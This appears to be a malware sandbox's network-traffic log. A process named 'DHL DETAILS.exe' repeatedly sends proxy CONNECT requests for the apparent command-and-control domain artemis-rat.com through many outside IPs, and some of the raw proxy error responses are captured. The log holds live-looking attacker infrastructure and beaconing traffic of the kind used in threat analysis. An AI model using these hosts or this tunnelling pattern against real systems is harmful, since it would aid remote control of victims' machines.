Mar 9, 2024 13:14:15.123048067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.416344881 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
709	192.168.2.5	52254	172.214.74.105	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.125011921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.645569086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.334088087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724143982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.333441973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.942682981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
710	192.168.2.5	51480	148.72.212.212	33905	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.126893044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.130086899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.224286079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.224140882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
711	192.168.2.5	52228	44.190.9.65	48100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.128547907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
712	192.168.2.5	52130	203.218.172.225	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.160470009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
713	192.168.2.5	52070	31.28.4.192	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.162404060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.508296013 CET	488	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 63 2e 70 6c 6f 6d 62 77 61 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 1c.plombway.ru Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
714	192.168.2.5	52082	8.130.34.237	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.164586067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.500276089 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
715	192.168.2.5	52370	104.24.220.52	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.164798975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.320872068 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
716	192.168.2.5	52096	185.220.226.235	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.165103912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
717	192.168.2.5	52307	167.172.159.43	22847	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.166917086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
718	192.168.2.5	52185	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.167325974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
719	192.168.2.5	52163	43.133.70.57	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.167330980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
720	192.168.2.5	52372	162.159.242.8	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.168272018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.331460953 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
721	192.168.2.5	52142	148.72.215.79	47202	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.195008039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.950402021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.974111080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.974066019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.973845959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.022430897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.046118021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
722	192.168.2.5	52231	72.210.221.223	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.195127010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
723	192.168.2.5	52092	58.20.248.139	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.195228100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.546745062 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
724	192.168.2.5	52369	159.65.77.168	8585	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.196454048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
725	192.168.2.5	52425	104.25.108.120	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.196623087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.351102114 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
726	192.168.2.5	52067	47.100.236.23	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.198610067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.942439079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.659812927 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
727	192.168.2.5	52173	34.87.84.105	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.198935032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.268563032 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:16 GMT Server: Apache Content-Length: 532 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 69 74 75 6b 40 6d 79 63 61 73 68 62 61 63 6b 2e 63 6f 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at pituk@mycashback.co to inform them of the time this e
Mar 9, 2024 13:14:16.268625021 CET	172	IN	Data Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
728	192.168.2.5	52447	104.16.207.86	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.199600935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.353852034 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
729	192.168.2.5	52440	162.159.243.178	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.201817989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.365663052 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
730	192.168.2.5	51450	216.137.184.253	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.201915026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.248760939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
